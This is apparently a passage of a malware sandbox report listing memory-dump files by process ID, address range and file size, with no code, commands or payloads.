                                                                                                    • memory/1312-458-0x00007FFD50430000-0x00007FFD50453000-memory.dmp

                                                                                                      Filesize

                                                                                                      140KB

                                                                                                    • memory/1312-459-0x00007FFD50490000-0x00007FFD5049F000-memory.dmp

                                                                                                      Filesize

                                                                                                      60KB

                                                                                                    • memory/1312-460-0x00007FFD503A0000-0x00007FFD503CD000-memory.dmp

                                                                                                      Filesize

                                                                                                      180KB

                                                                                                    • memory/1312-461-0x00007FFD501E0000-0x00007FFD501F9000-memory.dmp

                                                                                                      Filesize

                                                                                                      100KB

                                                                                                    • memory/1312-462-0x00007FFD501B0000-0x00007FFD501D3000-memory.dmp

                                                                                                      Filesize

                                                                                                      140KB

                                                                                                    • memory/1312-84-0x00007FFD50430000-0x00007FFD50453000-memory.dmp

                                                                                                      Filesize

                                                                                                      140KB

                                                                                                    • memory/1312-463-0x00007FFD3FCE0000-0x00007FFD3FE57000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.5MB

                                                                                                    • memory/1312-189-0x00007FFD3FCE0000-0x00007FFD3FE57000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.5MB

                                                                                                    • memory/1312-188-0x00007FFD501B0000-0x00007FFD501D3000-memory.dmp

                                                                                                      Filesize

                                                                                                      140KB

                                                                                                    • memory/1312-186-0x00007FFD503A0000-0x00007FFD503CD000-memory.dmp

                                                                                                      Filesize

                                                                                                      180KB

                                                                                                    • memory/1312-187-0x00007FFD501E0000-0x00007FFD501F9000-memory.dmp

                                                                                                      Filesize

                                                                                                      100KB

                                                                                                    • memory/1312-193-0x00007FFD50410000-0x00007FFD5041D000-memory.dmp

                                                                                                      Filesize

                                                                                                      52KB

                                                                                                    • memory/1312-192-0x00007FFD500D0000-0x00007FFD500E9000-memory.dmp

                                                                                                      Filesize

                                                                                                      100KB

                                                                                                    • memory/1312-209-0x00007FFD3F6A0000-0x00007FFD3F7BC000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.1MB

                                                                                                    • memory/1312-207-0x00007FFD502E0000-0x00007FFD502ED000-memory.dmp

                                                                                                      Filesize

                                                                                                      52KB

                                                                                                    • memory/1312-206-0x00007FFD50070000-0x00007FFD50084000-memory.dmp

                                                                                                      Filesize

                                                                                                      80KB

                                                                                                    • memory/1312-203-0x00007FFD50430000-0x00007FFD50453000-memory.dmp

                                                                                                      Filesize

                                                                                                      140KB

                                                                                                    • memory/1312-202-0x00007FFD3F7C0000-0x00007FFD3FCE0000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.1MB

                                                                                                    • memory/1312-201-0x0000024D3D200000-0x0000024D3D720000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.1MB

                                                                                                    • memory/1312-200-0x00007FFD4FA90000-0x00007FFD4FB5D000-memory.dmp

                                                                                                      Filesize

                                                                                                      820KB

                                                                                                    • memory/1312-199-0x00007FFD50090000-0x00007FFD500C3000-memory.dmp

                                                                                                      Filesize

                                                                                                      204KB

                                                                                                    • memory/1312-198-0x00007FFD40300000-0x00007FFD408E9000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.9MB

                                                                                                    • memory/1312-464-0x00007FFD500D0000-0x00007FFD500E9000-memory.dmp

                                                                                                      Filesize

                                                                                                      100KB

                                                                                                    • memory/1312-465-0x00007FFD50410000-0x00007FFD5041D000-memory.dmp

                                                                                                      Filesize

                                                                                                      52KB

                                                                                                    • memory/1312-252-0x00007FFD3FCE0000-0x00007FFD3FE57000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.5MB

                                                                                                    • memory/1312-251-0x00007FFD501B0000-0x00007FFD501D3000-memory.dmp

                                                                                                      Filesize

                                                                                                      140KB

                                                                                                    • memory/1312-330-0x00007FFD500D0000-0x00007FFD500E9000-memory.dmp

                                                                                                      Filesize

                                                                                                      100KB

                                                                                                    • memory/1312-466-0x00007FFD50090000-0x00007FFD500C3000-memory.dmp

                                                                                                      Filesize

                                                                                                      204KB

                                                                                                    • memory/1312-61-0x00007FFD40300000-0x00007FFD408E9000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.9MB

                                                                                                    • memory/1312-399-0x00007FFD3F7C0000-0x00007FFD3FCE0000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.1MB

                                                                                                    • memory/1312-398-0x00007FFD4FA90000-0x00007FFD4FB5D000-memory.dmp

                                                                                                      Filesize

                                                                                                      820KB

                                                                                                    • memory/1312-394-0x00007FFD3FCE0000-0x00007FFD3FE57000-memory.dmp

                                                                                                      Filesize

                                                                                                      1.5MB

                                                                                                    • memory/1312-388-0x00007FFD40300000-0x00007FFD408E9000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.9MB

                                                                                                    • memory/1312-397-0x00007FFD50090000-0x00007FFD500C3000-memory.dmp

                                                                                                      Filesize

                                                                                                      204KB

                                                                                                    • memory/1312-389-0x00007FFD50430000-0x00007FFD50453000-memory.dmp

                                                                                                      Filesize

                                                                                                      140KB

                                                                                                    • memory/1312-417-0x0000024D3D200000-0x0000024D3D720000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.1MB

                                                                                                    • memory/1312-442-0x00007FFD40300000-0x00007FFD408E9000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.9MB

                                                                                                    • memory/1312-467-0x00007FFD4FA90000-0x00007FFD4FB5D000-memory.dmp

                                                                                                      Filesize

                                                                                                      820KB

                                                                                                    • memory/2260-91-0x0000000005990000-0x00000000059A2000-memory.dmp

                                                                                                      Filesize

                                                                                                      72KB

                                                                                                    • memory/2260-86-0x0000000000AD0000-0x0000000000E14000-memory.dmp

                                                                                                      Filesize

                                                                                                      3.3MB

                                                                                                    • memory/2260-89-0x0000000006060000-0x0000000006604000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.6MB

                                                                                                    • memory/2260-87-0x0000000002EF0000-0x0000000002EFE000-memory.dmp

                                                                                                      Filesize

                                                                                                      56KB

                                                                                                    • memory/2260-88-0x0000000005680000-0x00000000056DC000-memory.dmp

                                                                                                      Filesize

                                                                                                      368KB

                                                                                                    • memory/2260-90-0x0000000005AB0000-0x0000000005B42000-memory.dmp

                                                                                                      Filesize

                                                                                                      584KB

                                                                                                    • memory/3888-59-0x0000000000400000-0x0000000001480000-memory.dmp

                                                                                                      Filesize

                                                                                                      16.5MB

                                                                                                    • memory/3968-344-0x000001F7ED7A0000-0x000001F7ED7A8000-memory.dmp

                                                                                                      Filesize

                                                                                                      32KB

                                                                                                    • memory/3984-122-0x0000000006DD0000-0x0000000006DDA000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/3984-121-0x00000000061A0000-0x00000000061B0000-memory.dmp

                                                                                                      Filesize

                                                                                                      64KB

                                                                                                    • memory/3984-119-0x0000000006110000-0x0000000006128000-memory.dmp

                                                                                                      Filesize

                                                                                                      96KB

                                                                                                    • memory/4012-113-0x00000000065A0000-0x000000000663C000-memory.dmp

                                                                                                      Filesize

                                                                                                      624KB

                                                                                                    • memory/4012-111-0x0000000005C50000-0x0000000005C9E000-memory.dmp

                                                                                                      Filesize

                                                                                                      312KB

                                                                                                    • memory/4012-109-0x00000000055B0000-0x00000000055C2000-memory.dmp

                                                                                                      Filesize

                                                                                                      72KB